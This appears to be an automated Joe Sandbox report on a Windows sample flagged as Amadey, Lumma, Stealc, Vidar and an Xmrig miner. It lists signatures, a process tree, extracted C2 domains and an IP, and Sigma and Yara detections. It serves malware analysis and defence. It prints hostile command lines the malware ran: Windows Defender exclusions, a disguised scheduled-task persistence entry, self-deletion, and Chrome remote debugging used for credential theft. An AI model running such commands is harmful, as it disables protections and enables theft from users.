Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579188
MD5:3799f4f2cfc27184ce70913f4ec3a8be
SHA1:4424871cdfd4f9b4fb1039049a75844401a7c358
SHA256:f95df3026cf4edcc3d334bfc20d188de06ea4e4497e94c63504b2b783dc3e55e
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3799F4F2CFC27184CE70913F4EC3A8BE)
    • skotes.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 3799F4F2CFC27184CE70913F4EC3A8BE)
  • skotes.exe (PID: 8008 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 3799F4F2CFC27184CE70913F4EC3A8BE)
    • 9bc5ebea0e.exe (PID: 3060 cmdline: "C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 6656 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 2032 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 6588 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6544 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7460 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1440 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7340 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7384 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7400 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7472 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 980 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 648 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 744 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7500 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7512 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7560 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 1608 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • 4268204ace.exe (PID: 7312 cmdline: "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" MD5: 04F57C6FB2B2CD8DCC4B38E4A93D4366)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1020 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6072 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 7d28d37061cb43098969a37cf25a380a.exe (PID: 5916 cmdline: "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe" MD5: CC36E2A5A3C64941A79C31CA320E9797)
        • chrome.exe (PID: 7540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7776 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2276,i,12319100627993208386,7193125325130927108,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 9c2981f3e5.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe" MD5: 6D3D9DB92D0303C635E5EE37927AF3D0)
    • 0577f55121.exe (PID: 1908 cmdline: "C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe" MD5: 8A1AE39FD06F240834EE7731E4470D2F)
    • 77594b3442.exe (PID: 7456 cmdline: "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe" MD5: C20D4E11E1046A5665D427BB4F6DE39E)
    • 513dad5c05.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe" MD5: 6149ACB6D658FE29407A8AB94D3A0784)
      • chrome.exe (PID: 6200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 9d4ddc637a.exe (PID: 5600 cmdline: "C:\Users\user\AppData\Local\Temp\1019033001\9d4ddc637a.exe" MD5: FB1BFBB2B0FA71F93BEFD137BECD031B)
  • Intel_PTT_EK_Recertification.exe (PID: 7772 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 2368 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 7872 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3796 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • svchost.exe (PID: 3156 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Intel_PTT_EK_Recertification.exe (PID: 7588 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 7580 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 2176 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 77594b3442.exe (PID: 2264 cmdline: "C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe" MD5: C20D4E11E1046A5665D427BB4F6DE39E)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "discokeyus.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000024.00000002.2597232510.0000000000E09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000033.00000002.2996017964.000000014040B000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              Click to see the 28 entries
              SourceRuleDescriptionAuthorStrings
              43.0.7d28d37061cb43098969a37cf25a380a.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.file.exe.50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  1.2.skotes.exe.6f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    36.2.explorer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      36.2.explorer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                      • 0x325ac8:$x1: donate.ssl.xmrig.com
                      Click to see the 10 entries

                      System Summary

                      barindex
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\77594b3442.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe, ParentProcessId: 7312, ParentProcessName: 4268204ace.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", ProcessId: 1020, ProcessName: powershell.exe
                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe" , ParentImage: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, ParentProcessId: 5916, ParentProcessName: 7d28d37061cb43098969a37cf25a380a.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7540, ProcessName: chrome.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\77594b3442.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe, ParentProcessId: 7312, ParentProcessName: 4268204ace.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\pnpyqs", ProcessId: 1020, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 648, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7512, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 648, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7512, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 648, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 7560, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3156, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeAvira: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                      Source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                      Source: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                      Source: 77594b3442.exe.7456.49.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "sweepyribs.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "discokeyus.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 37%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 56%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exeReversingLabs: Detection: 27%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]ReversingLabs: Detection: 75%
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeReversingLabs: Detection: 56%
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeReversingLabs: Detection: 37%
                      Source: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exeReversingLabs: Detection: 27%
                      Source: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exeReversingLabs: Detection: 75%
                      Source: file.exeVirustotal: Detection: 55%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                      Source: file.exeJoe Sandbox ML: detected
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7e0e6c0c-f

                      Bitcoin Miner

                      barindex
                      Source: Yara matchFile source: 36.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 51.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.Intel_PTT_EK_Recertification.exe.237117f0000.0.unpack, type: UNPACKEDPE
